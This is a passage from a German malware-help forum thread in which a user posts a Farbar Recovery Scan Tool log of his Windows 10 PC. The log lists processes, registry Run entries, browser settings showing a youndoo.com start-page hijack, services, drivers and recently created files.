Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 12:28:31.255
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-21 01:33:57.070
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-20 20:19:32.035
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 32%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5480.82 MB
Summe virtueller Speicher: 14527.12 MB
Verfügbarer virtueller Speicher: 11585.11 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:237.69 GB) (Free:147.41 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620.58 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
|
|
21.05.2017, 20:18
| #6 |
| /// TB-Ausbilder | Trojaner, Adware oder sonstiges ? Ich bitte um Beachtung meiner Hinweise, insbesondere Punkt 6. |
|
21.05.2017, 20:25
| #7 |
| | Trojaner, Adware oder sonstiges ? Jetzt nochmal richtig. Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf **** (21-05-2017 21:24:07)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-21]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-21 21:24 - 2017-05-21 21:24 - 00020202 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-21 21:04 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:56 - 2017-05-21 20:56 - 00000000 ___HD C:\OneDriveTemp
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-21 21:24 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
